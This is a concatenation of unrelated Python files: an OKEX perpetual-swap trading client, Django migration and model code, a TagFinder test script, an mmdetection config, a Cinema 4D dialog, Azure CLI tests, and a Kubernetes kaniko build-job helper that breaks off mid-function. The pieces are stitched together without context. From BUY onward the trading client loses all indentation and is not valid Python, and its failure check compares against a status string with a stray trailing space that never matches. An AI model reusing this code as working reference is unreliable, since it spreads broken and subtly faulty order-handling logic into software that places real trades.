                                return self.sell(float(self.get_ticker()['last']) * (1 - config.reissue_order),
                                                 size - state["已成交数量"])
                        except:
                            order_info = self.get_order_info(order_id=result['order_id'])  # re-query once after the failed cancel
                            if order_info["订单状态"] == "完全成交" or order_info["订单状态"] == "失败 ":
                                return {"【交易提醒】下单结果": order_info}
                if order_info["订单状态"] == "部分成交":
                    if float(self.get_ticker()['last']) <= price * (1 - config.price_cancellation_amplitude):
                        try:
                            self.revoke_order(order_id=result['order_id'])
                            state = self.get_order_info(order_id=result['order_id'])
                            if state['订单状态'] == "撤单成功":
                                return self.sell(float(self.get_ticker()['last']) * (1 - config.reissue_order),
                                                 size - state["已成交数量"])
                        except:
                            order_info = self.get_order_info(order_id=result['order_id'])  # re-query once after the failed cancel
                            if order_info["订单状态"] == "完全成交" or order_info["订单状态"] == "失败 ":
                                return {"【交易提醒】下单结果": order_info}
            if config.time_cancellation:  # time cancellation: cancel and reissue if still unfilled after the configured delay
                time.sleep(config.time_cancellation_seconds)
                order_info = self.get_order_info(order_id=result['order_id'])
                if order_info["订单状态"] == "等待成交":
                    try:
                        self.revoke_order(order_id=result['order_id'])
                        state = self.get_order_info(order_id=result['order_id'])
                        if state['订单状态'] == "撤单成功":
                            return self.sell(float(self.get_ticker()['last']) * (1 - config.reissue_order),
                                             size - state["已成交数量"])
                    except:
                        order_info = self.get_order_info(order_id=result['order_id'])  # re-query once after the failed cancel
                        if order_info["订单状态"] == "完全成交" or order_info["订单状态"] == "失败 ":
                            return {"【交易提醒】下单结果": order_info}
                if order_info["订单状态"] == "部分成交":
                    try:
                        self.revoke_order(order_id=result['order_id'])
                        state = self.get_order_info(order_id=result['order_id'])
                        if state['订单状态'] == "撤单成功":
                            return self.sell(float(self.get_ticker()['last']) * (1 - config.reissue_order),
                                             size - state["已成交数量"])
                    except:
                        order_info = self.get_order_info(order_id=result['order_id'])  # re-query once after the failed cancel
                        if order_info["订单状态"] == "完全成交" or order_info["订单状态"] == "失败 ":
                            return {"【交易提醒】下单结果": order_info}
            if config.automatic_cancellation:
                # If the order is not fully filled and neither price nor time
                # cancellation is configured, cancel automatically and return
                # the order/cancel outcome.
                try:
                    self.revoke_order(order_id=result['order_id'])
                    state = self.get_order_info(order_id=result['order_id'])
                    return {"【交易提醒】下单结果": state}
                except:
                    order_info = self.get_order_info(order_id=result['order_id'])  # re-query once after the failed cancel
                    if order_info["订单状态"] == "完全成交" or order_info["订单状态"] == "失败 ":
                        return {"【交易提醒】下单结果": order_info}
            else:  # trade assistant disabled: return the queried order info directly
                return {"【交易提醒】下单结果": order_info}
        else:  # backtest mode
            return "回测模拟下单成功!"
    def sellshort(self, price, size, order_type=None):
        """Place a short-sell order (take_order type 2 — open short, per OKEX
        v3 order-type semantics), applying the configured trade-assistant
        logic (price/time/automatic cancellation with reissue).

        :param price: limit price
        :param size: contract quantity; on reissue the unfilled remainder is used
        :param order_type: OKEX order-type flag; defaults to 0 (ordinary order)
        :return: dict with the final order info in live mode, or a backtest
            placeholder string in backtest mode
        :raises SendOrderError: if the initial submission fails
        """
        if config.backtest is False:
            order_type = order_type or 0
            try:
                result = self.__okex_swap.take_order(self.__instrument_id, 2, price, size, order_type=order_type)
            except Exception as e:
                raise SendOrderError(e)
            order_info = self.get_order_info(order_id=result['order_id'])  # query the order state once after placing
            if order_info["订单状态"] == "完全成交" or order_info["订单状态"] == "失败 ":  # fully filled or failed: return immediately
                return {"【交易提醒】下单结果": order_info}
            # The order is neither fully filled nor failed past this point.
            if config.price_cancellation:  # price cancellation: cancel and reissue if the last price moved beyond the threshold
                if order_info["订单状态"] == "等待成交":
                    if float(self.get_ticker()['last']) <= price * (1 - config.price_cancellation_amplitude):
                        try:
                            self.revoke_order(order_id=result['order_id'])
                            state = self.get_order_info(order_id=result['order_id'])
                            if state['订单状态'] == "撤单成功":
                                return self.sellshort(float(self.get_ticker()['last']) * (1 - config.reissue_order),
                                                      size - state["已成交数量"])
                        except:
                            order_info = self.get_order_info(order_id=result['order_id'])  # re-query once after the failed cancel
                            if order_info["订单状态"] == "完全成交" or order_info["订单状态"] == "失败 ":
                                return {"【交易提醒】下单结果": order_info}
                if order_info["订单状态"] == "部分成交":
                    if float(self.get_ticker()['last']) <= price * (1 - config.price_cancellation_amplitude):
                        try:
                            self.revoke_order(order_id=result['order_id'])
                            state = self.get_order_info(order_id=result['order_id'])
                            if state['订单状态'] == "撤单成功":
                                return self.sellshort(float(self.get_ticker()['last']) * (1 - config.reissue_order),
                                                      size - state["已成交数量"])
                        except:
                            order_info = self.get_order_info(order_id=result['order_id'])  # re-query once after the failed cancel
                            if order_info["订单状态"] == "完全成交" or order_info["订单状态"] == "失败 ":
                                return {"【交易提醒】下单结果": order_info}
            if config.time_cancellation:  # time cancellation: cancel and reissue if still unfilled after the configured delay
                time.sleep(config.time_cancellation_seconds)
                order_info = self.get_order_info(order_id=result['order_id'])
                if order_info["订单状态"] == "等待成交":
                    try:
                        self.revoke_order(order_id=result['order_id'])
                        state = self.get_order_info(order_id=result['order_id'])
                        if state['订单状态'] == "撤单成功":
                            return self.sellshort(float(self.get_ticker()['last']) * (1 - config.reissue_order),
                                                  size - state["已成交数量"])
                    except:
                        order_info = self.get_order_info(order_id=result['order_id'])  # re-query once after the failed cancel
                        if order_info["订单状态"] == "完全成交" or order_info["订单状态"] == "失败 ":
                            return {"【交易提醒】下单结果": order_info}
                if order_info["订单状态"] == "部分成交":
                    try:
                        self.revoke_order(order_id=result['order_id'])
                        state = self.get_order_info(order_id=result['order_id'])
                        if state['订单状态'] == "撤单成功":
                            return self.sellshort(float(self.get_ticker()['last']) * (1 - config.reissue_order),
                                                  size - state["已成交数量"])
                    except:
                        order_info = self.get_order_info(order_id=result['order_id'])  # re-query once after the failed cancel
                        if order_info["订单状态"] == "完全成交" or order_info["订单状态"] == "失败 ":
                            return {"【交易提醒】下单结果": order_info}
            if config.automatic_cancellation:
                # If the order is not fully filled and neither price nor time
                # cancellation is configured, cancel automatically and return
                # the order/cancel outcome.
                try:
                    self.revoke_order(order_id=result['order_id'])
                    state = self.get_order_info(order_id=result['order_id'])
                    return {"【交易提醒】下单结果": state}
                except:
                    order_info = self.get_order_info(order_id=result['order_id'])  # re-query once after the failed cancel
                    if order_info["订单状态"] == "完全成交" or order_info["订单状态"] == "失败 ":
                        return {"【交易提醒】下单结果": order_info}
            else:  # trade assistant disabled: return the queried order info directly
                return {"【交易提醒】下单结果": order_info}
        else:  # backtest mode
            return "回测模拟下单成功!"
    def buytocover(self, price, size, order_type=None):
        """Place a buy order that closes (covers) an existing short position.

        Live mode: sends the order, queries its status once, then — depending
        on the configured trade-assistant options (price cancellation, time
        cancellation, automatic cancellation) — may cancel and recursively
        re-issue the order for the unfilled remainder at an adjusted price.
        Backtest mode returns a simulated-success string instead.

        :param price: limit price for the covering order
        :param size: number of contracts to cover
        :param order_type: passed through to the exchange API; defaults to 0
        :return: dict keyed "【交易提醒】下单结果" with the final order info,
            or a string in backtest mode
        :raises SendOrderError: when the exchange rejects the order request
        """
        if config.backtest is False:
            order_type = order_type or 0
            try:
                # type 4 = buy to cover (close short) on the OKEX swap API
                result = self.__okex_swap.take_order(self.__instrument_id, 4, price, size, order_type=order_type)
            except Exception as e:
                raise SendOrderError(e)
            order_info = self.get_order_info(order_id=result['order_id'])  # query the order status once after placing
            # NOTE(review): "失败 " below carries a trailing space, but get_order_info
            # returns "失败" without one, so the failure comparison never matches — confirm.
            if order_info["订单状态"] == "完全成交" or order_info["订单状态"] == "失败 ":  # fully filled or failed: return the result
                return {"【交易提醒】下单结果": order_info}
            # The order is neither fully filled nor failed beyond this point.
            if config.price_cancellation:  # price cancellation: if the last price ran past the limit by the configured amplitude, cancel and re-issue
                if order_info["订单状态"] == "等待成交":
                    if float(self.get_ticker()['last']) >= price * (1 + config.price_cancellation_amplitude):
                        try:
                            self.revoke_order(order_id=result['order_id'])
                            state = self.get_order_info(order_id=result['order_id'])
                            if state['订单状态'] == "撤单成功":
                                # Re-issue for the unfilled remainder at a bumped price.
                                # NOTE(review): order_type is not forwarded on re-issue — confirm intended.
                                return self.buytocover(float(self.get_ticker()['last']) * (1 + config.reissue_order),
                                                       size - state["已成交数量"])
                        except:  # revoke may race a fill; re-check the order instead of propagating
                            order_info = self.get_order_info(order_id=result['order_id'])
                            if order_info["订单状态"] == "完全成交" or order_info["订单状态"] == "失败 ":
                                return {"【交易提醒】下单结果": order_info}
                if order_info["订单状态"] == "部分成交":
                    if float(self.get_ticker()['last']) >= price * (1 + config.price_cancellation_amplitude):
                        try:
                            self.revoke_order(order_id=result['order_id'])
                            state = self.get_order_info(order_id=result['order_id'])
                            if state['订单状态'] == "撤单成功":
                                return self.buytocover(float(self.get_ticker()['last']) * (1 + config.reissue_order),
                                                       size - state["已成交数量"])
                        except:
                            order_info = self.get_order_info(order_id=result['order_id'])
                            if order_info["订单状态"] == "完全成交" or order_info["订单状态"] == "失败 ":
                                return {"【交易提醒】下单结果": order_info}
            if config.time_cancellation:  # time cancellation: wait the configured seconds, then cancel and re-issue until fully filled
                time.sleep(config.time_cancellation_seconds)
                order_info = self.get_order_info(order_id=result['order_id'])
                if order_info["订单状态"] == "等待成交":
                    try:
                        self.revoke_order(order_id=result['order_id'])
                        state = self.get_order_info(order_id=result['order_id'])
                        if state['订单状态'] == "撤单成功":
                            return self.buytocover(float(self.get_ticker()['last']) * (1 + config.reissue_order),
                                                   size - state["已成交数量"])
                    except:
                        order_info = self.get_order_info(order_id=result['order_id'])
                        if order_info["订单状态"] == "完全成交" or order_info["订单状态"] == "失败 ":
                            return {"【交易提醒】下单结果": order_info}
                if order_info["订单状态"] == "部分成交":
                    try:
                        self.revoke_order(order_id=result['order_id'])
                        state = self.get_order_info(order_id=result['order_id'])
                        if state['订单状态'] == "撤单成功":
                            return self.buytocover(float(self.get_ticker()['last']) * (1 + config.reissue_order),
                                                   size - state["已成交数量"])
                    except:
                        order_info = self.get_order_info(order_id=result['order_id'])
                        if order_info["订单状态"] == "完全成交" or order_info["订单状态"] == "失败 ":
                            return {"【交易提醒】下单结果": order_info}
            if config.automatic_cancellation:
                # No price/time cancellation configured: cancel outright and return the result.
                try:
                    self.revoke_order(order_id=result['order_id'])
                    state = self.get_order_info(order_id=result['order_id'])
                    return {"【交易提醒】下单结果": state}
                except:
                    order_info = self.get_order_info(order_id=result['order_id'])
                    if order_info["订单状态"] == "完全成交" or order_info["订单状态"] == "失败 ":
                        return {"【交易提醒】下单结果": order_info}
            else:  # trade assistant disabled: return the queried order info directly
                return {"【交易提醒】下单结果": order_info}
        else:  # backtest mode: no real order is sent
            return "回测模拟下单成功!"
def BUY(self, cover_short_price, cover_short_size, open_long_price, open_long_size, order_type=None):
if config.backtest is False:
order_type = order_type or 0
result1 = self.buytocover(cover_short_price, cover_short_size, order_type)
if "完全成交" in str(result1):
result2 = self.buy(open_long_price, open_long_size, order_type)
return {"平仓结果": result1, "开仓结果": result2}
else:
return result1
else: # 回测模式
return "回测模拟下单成功!"
def SELL(self, cover_long_price, cover_long_size, open_short_price, open_short_size, order_type=None):
if config.backtest is False:
order_type = order_type or 0
result1 = self.sell(cover_long_price, cover_long_size, order_type)
if "完全成交" in str(result1):
result2 = self.sellshort(open_short_price, open_short_size, order_type)
return {"平仓结果": result1, "开仓结果": result2}
else:
return result1
else: # 回测模式
return "回测模拟下单成功!"
def get_order_list(self, state, limit):
receipt = self.__okex_swap.get_order_list(self.__instrument_id, state=state, limit=limit)
return receipt
def revoke_order(self, order_id):
receipt = self.__okex_swap.revoke_order(self.__instrument_id, order_id)
if receipt['error_code'] == "0":
return '【交易提醒】撤单成功'
else:
return '【交易提醒】撤单失败' + receipt['error_message']
def get_order_info(self, order_id):
result = self.__okex_swap.get_order_info(self.__instrument_id, order_id)
instrument_id = result['instrument_id']
action = None
if result['type'] == '1':
action = "买入开多"
elif result['type'] == '2':
action = "卖出开空"
if result['type'] == '3':
action = "卖出平多"
if result['type'] == '4':
action = "买入平空"
price = float(result['price_avg']) # 成交均价
amount = int(result['filled_qty']) # 已成交数量
if instrument_id.split("-")[1] == "usd" or instrument_id.split("-")[1] == "USD":
turnover = float(result['contract_val']) * int(result['filled_qty'])
elif instrument_id.split("-")[1] == "usdt" or instrument_id.split("-")[1] == "USDT":
turnover = round(float(result['contract_val']) * int(result['filled_qty']) * float(result['price_avg']), 2)
if int(result['state']) == 2:
dict = {"交易所": "Okex永续合约", "合约ID": instrument_id, "方向": action, "订单状态": "完全成交", "成交均价": price,
"已成交数量": amount, "成交金额": turnover}
return dict
elif int(result['state']) == -2:
dict = {"交易所": "Okex永续合约", "合约ID": instrument_id, "方向": action, "订单状态": "失败"}
return dict
elif int(result['state']) == -1:
dict = {"交易所": "Okex永续合约", "合约ID": instrument_id, "方向": action, "订单状态": "撤单成功", "成交均价": price,
"已成交数量": amount, "成交金额": turnover}
return dict
elif int(result['state']) == 0:
dict = {"交易所": "Okex永续合约", "合约ID": instrument_id, "方向": action, "订单状态": "等待成交"}
return dict
elif int(result['state']) == 1:
dict = {"交易所": "Okex永续合约", "合约ID": instrument_id, "方向": action, "订单状态": "部分成交", "成交均价": price,
"已成交数量": amount, "成交金额": turnover}
return dict
elif int(result['state']) == 3:
dict = {"交易所": "Okex永续合约", "合约ID": instrument_id, "方向": action, "订单状态": "下单中"}
return dict
elif int(result['state']) == 4:
dict = {"交易所": "Okex永续合约", "合约ID": instrument_id, "方向": action, "订单状态": "撤单中"}
return dict
def get_kline(self, time_frame):
if time_frame == "1m" or time_frame == "1M":
granularity = '60'
elif time_frame == '3m' or time_frame == "3M":
granularity = '180'
elif time_frame == '5m' or time_frame == "5M":
granularity = '300'
elif time_frame == '15m' or time_frame == "15M":
granularity = '900'
elif time_frame == '30m' or time_frame == "30M":
granularity = '1800'
elif time_frame == '1h' or time_frame == "1H":
granularity = '3600'
elif time_frame == '2h' or time_frame == "2H":
granularity = '7200'
elif time_frame == '4h' or time_frame == "4H":
granularity = '14400'
elif time_frame == '6h' or time_frame == "6H":
granularity = '21600'
elif time_frame == '12h' or time_frame == "12H":
granularity = '43200'
elif time_frame == '1d' or time_frame == "1D":
granularity = '86400'
else:
raise KlineError
receipt = self.__okex_swap.get_kline(self.__instrument_id, granularity=granularity)
return receipt
def get_position(self, mode=None):
receipt = self.__okex_swap.get_specific_position(self.__instrument_id)
if mode == "both":
result = {
receipt['holding'][0]["side"]: {
"price": float(receipt['holding'][0]['avg_cost']),
"amount": int(receipt['holding'][0]['position'])
},
receipt['holding'][1]["side"]: {
"price": float(receipt['holding'][1]['avg_cost']),
"amount": int(receipt['holding'][1]['position'])
}
}
return result
else:
direction = receipt['holding'][0]['side']
amount = int(receipt['holding'][0]['position'])
price = float(receipt['holding'][0]['avg_cost'])
if amount == 0:
direction = "none"
result = {'direction': direction, 'amount': amount, 'price': price}
return result
def get_contract_value(self):
receipt = self.__okex_swap.get_instruments()
result = {}
for item in receipt:
result[item['instrument_id']] = item['contract_val']
contract_value = float(result[self.__instrument_id])
return contract_value
def get_ticker(self):
receipt = self.__okex_swap.get_specific_ticker(instrument_id=self.__instrument_id)
return receipt
def get_depth(self, type=None, size=None):
"""
OKEX永续合约获取深度数据
:param type: 如不传参,返回asks和bids;只获取asks传入type="asks";只获取"bids"传入type="bids"
:param size: 返回深度档位数量,最多返回200,默认10档
:return:
"""
size = size or 10
response = self.__okex_swap.get_depth(self.__instrument_id, size=size)
asks_list = response["asks"]
bids_list = response["bids"]
asks = []
bids = []
for i in asks_list:
asks.append(float(i[0]))
for j in bids_list:
bids.append(float(j[0]))
if type == "asks":
return asks
elif type == "bids":
return bids
else:
return response
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-12-01 22:15
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    """Remove the ``previous_version`` field from ``drevent`` and the
    ``superseded`` field from ``siteevent`` in the ``vtn`` app."""

    dependencies = [
        ('vtn', '0052_auto_20171201_1346'),
    ]

    operations = [
        # Drop DREvent.previous_version.
        migrations.RemoveField(
            model_name='drevent',
            name='previous_version',
        ),
        # Drop SiteEvent.superseded.
        migrations.RemoveField(
            model_name='siteevent',
            name='superseded',
        ),
    ]
|
from django.db.models import (
CASCADE,
Model,
OneToOneField,
ForeignKey,
)
from gbe.models import StyleVersion
from django.contrib.auth.models import User
class UserStylePreview(Model):
    """Records which StyleVersion a given user is currently previewing."""
    # The style version being previewed; row is removed when the version is deleted.
    version = ForeignKey(StyleVersion, on_delete=CASCADE)
    # One-to-one: each user can have at most one active style preview.
    previewer = OneToOneField(User, on_delete=CASCADE)
    class Meta:
        app_label = "gbe"
|
# -*- coding: utf-8 -*-
'''
Created on 01.12.2014
@author: Simon Gwerder
'''
import json
import timeit
import requests
from ordered_set import OrderedSet
from utilities import utils
from utilities.retry import retry
class IDPreset:
    """Container for one iD-editor preset: display name, search terms and tags.

    Fix: the original also declared ``name``/``terms``/``tags`` as class-level
    attributes; the mutable lists were shared across anything that touched
    them before ``__init__`` ran. Per-instance attributes are sufficient.
    """

    def __init__(self):
        self.name = None    # preset display name
        self.terms = []     # search terms (the name is appended here too)
        self.tags = []      # "key=value" tag strings
class IDPresetsSetup:
    """Loads iD-editor presets from a JSON preset file into IDPreset objects."""

    def getIDPresets(self):
        """Return the ordered set of loaded IDPreset objects."""
        return self.idPresets

    def __init__(self, presetFilePath):
        # Fix: was a class-level OrderedSet shared by every instance.
        self.idPresets = OrderedSet()
        if presetFilePath is None:
            return
        # Fix: use a context manager so the file is closed even on error.
        with open(presetFilePath) as fileHandler:
            jsonData = json.load(fileHandler)
        for item in sorted(jsonData):
            if item.count('/') > 1:
                continue  # skip deeply nested preset paths
            entry = jsonData[item]
            # Presets without a name or without tags are skipped (as before).
            if 'name' not in entry or 'tags' not in entry:
                continue
            idPreset = IDPreset()
            idPreset.name = entry['name']
            for key in entry['tags']:
                # Fix: was ``key is not 'name'`` — identity comparison on a
                # string literal; string equality is what is meant.
                if key != 'name':
                    idPreset.tags.append(key + '=' + entry['tags'][key])
            # The name itself is searchable too, so it joins the terms list.
            idPreset.terms.append(idPreset.name)
            for term in entry.get('terms', []):
                idPreset.terms.append(term)
            self.idPresets.append(idPreset)
class TestRun:
    """Blackbox test runner: queries a locally running TagFinder instance with
    every preset's search terms and reports how many presets, preset names and
    alternative terms resolve to the expected OSM tags.
    """

    # TagFinder search endpoint; the service must already be running locally.
    tagFinderAPI = 'http://localhost:5000/api/search?q='

    @retry(Exception, tries=3)
    def apiCallTagfinder(self, searchTerm):
        """Call the TagFinder search API; return parsed JSON, or None on HTTP error."""
        response = requests.get(self.tagFinderAPI + searchTerm)
        if response.status_code < 400:
            return response.json()
        return None

    def getTagDictFromCall(self, responseJson):
        """Map each result's prefLabel to its searchMeta; bare keys become "key=*"."""
        retDict = { }
        for tfTag in responseJson:
            prefLabel = tfTag['prefLabel']
            if '=' not in prefLabel:  # a bare key, not a key=value tag
                prefLabel = prefLabel + '=*'
            retDict[prefLabel] = tfTag['searchMeta']
        return retDict

    def __init__(self, idPresetsSetup):
        """Run the whole suite against the presets in ``idPresetsSetup``.

        Note: prints were converted to single-argument ``print(...)`` calls,
        which behave identically under Python 2 and also parse under Python 3.
        """
        print('IDEDITOR PRESET TESTS')
        current = 1
        testTotal = len(idPresetsSetup.getIDPresets())
        nameTotal = len(idPresetsSetup.getIDPresets())
        # Preset names are also contained in the terms list (for convenient
        # search), so start at -nameTotal and count every term below.
        altTermTotal = -nameTotal
        testFound = 0
        nameFound = 0
        altTermFound = 0
        for idPreset in idPresetsSetup.getIDPresets():
            titleStr = '\n\nTest ' + str(current) + '/' + str(len(idPresetsSetup.getIDPresets())) + ' - Name: ' + idPreset.name
            print(titleStr)
            print('=' * 60)
            print('Tags: ' + ", ".join(idPreset.tags))
            found = False
            for term in idPreset.terms:
                responseJson = self.apiCallTagfinder(term)
                if responseJson is None:
                    print('Call failed!')
                else:
                    foundList = self.getTagDictFromCall(responseJson)
                    interSectionSet = set(idPreset.tags).intersection(set(foundList.keys()))
                    if len(interSectionSet) == 0:
                        print('{0}{1:<20s}{2}'.format('Term: ', term, ' > none found'))
                    else:
                        found = True
                        print('{0}{1:<20s}{2}{3}'.format('Term: ', term, ' > found: ', ', '.join(interSectionSet)))
                        # Bug fix: was ``term is idPreset.name`` — identity
                        # comparison on strings; equality is what is meant.
                        if term == idPreset.name:
                            nameFound = nameFound + 1
                        else:
                            altTermFound = altTermFound + 1
                altTermTotal = altTermTotal + 1
            if found:
                testFound = testFound + 1
            current = current + 1
        # Summary over all presets.
        print('\n\n')
        print('=' * 60)
        print('=' * 60)
        print('Found test tags : ' + str(testFound) + '/' + str(testTotal))
        print('Found \"names\" : ' + str(nameFound) + '/' + str(nameTotal))
        print('Found \"terms\" : ' + str(altTermFound) + '/' + str(altTermTotal))
if __name__ == '__main__':
    # Time a full blackbox run against a locally running TagFinder instance.
    startTime = timeit.default_timer()
    setup = IDPresetsSetup(utils.testDir() + 'blackboxtests.json')
    # TagFinder needs to be running. Can also start TagFinder locally here.
    TestRun(setup)
    endTime = timeit.default_timer()
    elapsed = endTime - startTime
    print '\nTime elapsed running test: ' + str(elapsed / 60) + ' mins'
|
# Base config files this config inherits from (model, dataset, schedule and
# runtime); merged in order by the mmdetection/mmcv config loader.
_base_ = [
    'cascade_mask_rcnn_r50_fpn.py',
    'coco_instance.py',
    'schedule_1x.py', 'default_runtime.py'
]
|
import c4d
from ..Const import Const
from .ConfigManagerRedshift import ConfigManagerRedshift
const = Const()
class ConfigManager(c4d.gui.GeDialog, ConfigManagerRedshift):
    """Cinema 4D dialog for editing the plugin's Redshift configuration.

    Loads the JSON config on creation, shows the Redshift options in a
    scrollable tab, and writes the (possibly modified) config back to disk
    when the user confirms with Ok.
    """
    # NOTE(review): GeDialog's own __init__ is never called here — confirm the
    # c4d API does not require it before CreateLayout/Command run.
    def __init__(self):
        self.jsonContent = self.loadJsonFile()              # full JSON config read from disk
        self.redshiftConfig = self.jsonContent["redshift"]  # Redshift sub-section shown in the UI
        self.dataChanged = False                            # becomes True once the user saves
    def refresh(self):
        """Re-read the JSON config from disk, discarding unsaved UI state."""
        self.jsonContent = self.loadJsonFile()
        self.redshiftConfig = self.jsonContent["redshift"]
        self.dataChanged = False
    def Command(self, id, msg):
        """Handle dialog buttons: Ok saves and closes, Cancel just closes."""
        if id == const.UI_OPTION_END_OK:
            # NOTE(review): self is passed explicitly on top of the bound self;
            # presumably generateRedshiftjson (from ConfigManagerRedshift) is
            # declared with that signature — confirm.
            self.generateRedshiftjson(self)
            self.jsonContent = self.saveJsonFile(self.jsonContent)
            self.dataChanged = True
            self.Close()
        if id == const.UI_OPTION_END_CANCEL:
            self.Close()
        return True
    def CreateLayout(self):
        """Build the dialog: a scrollable Redshift options tab plus Ok/Cancel."""
        #Redshift
        self.SetTitle('Config')
        # Outer group -> vertical scroll group -> checkbox group.
        if self.GroupBegin(const.GRP_TAB_REDSHIFT_GRP, c4d.BFH_SCALEFIT | c4d.BFV_SCALEFIT, 1, 500, "Redshift", inith=200):
            if self.ScrollGroupBegin(const.GRP_TAB_REDSHIFT_SCROLL_OPT, c4d.BFH_SCALEFIT | c4d.BFV_SCALEFIT, c4d.SCROLLGROUP_VERT, 0, 0):
                if self.GroupBegin(const.GRP_OPT_TAB_REDSHIFT, c4d.BFH_SCALEFIT | c4d.BFV_SCALEFIT, 1, 500, "Redshift"):
                    self.createRedshiftCheckBox(self)
                self.GroupEnd()
            self.GroupEnd()
        self.GroupEnd()
        # Ok / Cancel button row.
        if self.GroupBegin(const.LIGHT_LISTER_REDSHIFT_OPTIONS_START, c4d.BFH_CENTER | c4d.BFV_CENTER, 100, 100):
            self.GroupBorderSpace(30, 5, 0, 2)
            self.AddButton(const.UI_OPTION_END_OK, c4d.BFH_CENTER | c4d.BFV_TOP, 0, 20, "Ok ")
            self.AddButton(const.UI_OPTION_END_CANCEL, c4d.BFH_CENTER | c4d.BFV_TOP, 0, 20, "Cancel")
        self.GroupEnd()
        return True
|
import pytest
# Set the path to import az
import context
from az.cli import az
# Known-good command: listing resource groups for the logged-in account.
AZ_SUCCESSFUL_COMMAND = "group list"
# Known-bad command: showing a resource group that does not exist.
AZ_FAIL_COMMAND = "group show -n this-does-not-exist"
def test_az(az_login):
    """A successful az command returns exit code 0 and an empty error log."""
    exit_code, _, error_log = az(AZ_SUCCESSFUL_COMMAND)
    assert exit_code == 0
    assert error_log == ""
def test_az_failure(az_login):
    """A failing az command returns a nonzero exit code and a nonempty error log."""
    exit_code, _, error_log = az(AZ_FAIL_COMMAND)
    assert exit_code != 0
    assert error_log
|
import datetime
import time
from typing import TYPE_CHECKING
import frappe
from kubernetes import client, config
from kubernetes.client.rest import ApiException
if TYPE_CHECKING:
from erpnext_feature_board.erpnext_feature_board.doctype.improvement.improvement import (
Improvement,
)
def get_container_registry():
    """Return the configured container registry host (default: local registry)."""
    conf = frappe.get_conf()
    return conf.get("container_registry", "registry.localhost:5000")
def to_dict(obj):
    """Recursively convert a Kubernetes API model object into plain Python data.

    Objects exposing ``attribute_map`` (OpenAPI-generated models) become dicts
    keyed by their wire names (None-valued attributes omitted), lists are
    converted element-wise, datetimes are stringified, and anything else is
    returned unchanged.
    """
    if hasattr(obj, "attribute_map"):
        result = {}
        for attr, wire_name in obj.attribute_map.items():
            val = getattr(obj, attr)
            if val is not None:
                result[wire_name] = to_dict(val)
        return result
    if isinstance(obj, list):
        return [to_dict(x) for x in obj]
    # Bug fix: the original compared ``type(obj) == datetime`` against the
    # *module*, which is never true, so datetimes leaked through unconverted.
    if isinstance(obj, datetime.datetime):
        return str(obj)
    return obj
def load_config():
    """Load kube config from file in developer mode, otherwise in-cluster config."""
    developer_mode = frappe.get_conf().get("developer_mode")
    if developer_mode:
        config.load_kube_config()
    else:
        config.load_incluster_config()
def get_namespace():
    """Kubernetes namespace to operate in (site config key ``kubernetes_namespace``)."""
    conf = frappe.get_conf()
    return conf.get("kubernetes_namespace", "efb")
def create_build_image_job(improvement: "Improvement", image_tag, git_repo, git_branch):
    """Create a Kubernetes Job that builds and pushes the improvement's
    worker and nginx container images with kaniko.

    Two kaniko containers run in one pod, building from the frappe_docker
    repo with the given git repo/branch and image tag and pushing to the
    configured registry. In developer mode the push is ``--insecure`` and a
    host alias maps registry.localhost to the docker host; otherwise a
    projected secret supplies registry push credentials.

    :param improvement: Improvement document (name and app_name are used)
    :param image_tag: base image tag passed as IMAGE_TAG / FRAPPE_BRANCH
    :param git_repo: git repository URL of the app being built
    :param git_branch: git branch of the app being built
    :return: created Job as plain data, or an error dict on failure
    """
    load_config()
    job_name = f"build-{improvement.name}".lower()  # k8s object names must be lowercase
    batch_v1_api = client.BatchV1Api()
    body = client.V1Job(api_version="batch/v1", kind="Job")
    body.metadata = client.V1ObjectMeta(
        namespace=get_namespace(),
        name=job_name,
    )
    body.status = client.V1JobStatus()
    # Filled in below depending on developer mode.
    volume_mounts = None
    volumes = None
    host_aliases = None
    # kaniko arguments for the worker image build.
    worker_args = [
        f"--dockerfile=build/{improvement.app_name}-worker/Dockerfile",
        "--context=git://github.com/frappe/frappe_docker.git",
        f"--build-arg=GIT_REPO={git_repo}",
        f"--build-arg=IMAGE_TAG={image_tag}",
        f"--build-arg=GIT_BRANCH={git_branch}",
        f"--destination={get_container_registry()}/{improvement.app_name}-worker:{improvement.name}",
    ]
    # kaniko arguments for the nginx image build.
    nginx_args = [
        f"--dockerfile=build/{improvement.app_name}-nginx/Dockerfile",
        "--context=git://github.com/frappe/frappe_docker.git",
        f"--build-arg=GIT_REPO={git_repo}",
        f"--build-arg=IMAGE_TAG={image_tag}",
        f"--build-arg=GIT_BRANCH={git_branch}",
        f"--build-arg=FRAPPE_BRANCH={image_tag}",
        f"--destination={get_container_registry()}/{improvement.app_name}-nginx:{improvement.name}",
    ]
    if frappe.get_conf().get("developer_mode"):
        # Local registry has no TLS; also make registry.localhost resolve to
        # the docker host from inside the build pod.
        worker_args.append("--insecure")
        nginx_args.append("--insecure")
        host_aliases = [
            client.V1HostAlias(
                ip=frappe.get_conf().get("docker_host_ip", "172.17.0.1"),
                hostnames=["registry.localhost"],
            )
        ]
    if not frappe.get_conf().get("developer_mode"):
        # Production: mount registry push credentials for kaniko from a secret.
        volume_mounts = [
            client.V1VolumeMount(
                mount_path="/kaniko/.docker",
                name="container-config",
            )
        ]
        volumes = [
            client.V1Volume(
                name="container-config",
                projected=client.V1ProjectedVolumeSource(
                    sources=[
                        client.V1VolumeProjection(
                            secret=client.V1SecretProjection(
                                name=frappe.get_conf().get(
                                    "container_push_secret", "regcred"
                                ),
                                items=[
                                    client.V1KeyToPath(
                                        key=".dockerconfigjson",
                                        path="config.json",
                                    )
                                ],
                            )
                        )
                    ]
                ),
            )
        ]
    # One pod with both kaniko builds; never restarted on failure.
    body.spec = client.V1JobSpec(
        template=client.V1PodTemplateSpec(
            spec=client.V1PodSpec(
                security_context=client.V1PodSecurityContext(
                    supplemental_groups=[1000]
                ),
                containers=[
                    client.V1Container(
                        name="build-worker",
                        image="gcr.io/kaniko-project/executor:latest",
                        args=worker_args,
                        volume_mounts=volume_mounts,
                    ),
                    client.V1Container(
                        name="build-nginx",
                        image="gcr.io/kaniko-project/executor:latest",
                        args=nginx_args,
                        volume_mounts=volume_mounts,
                    ),
                ],
                restart_policy="Never",
                volumes=volumes,
                host_aliases=host_aliases,
            )
        )
    )
    try:
        api_response = batch_v1_api.create_namespaced_job(
            get_namespace(), body, pretty=True
        )
        return to_dict(api_response)
    except (ApiException, Exception) as e:
        out = {
            "error": e,
            "function_name": "create_build_image_job",
            "params": {
                "improvement_name": improvement.name,
                "image_tag": image_tag,
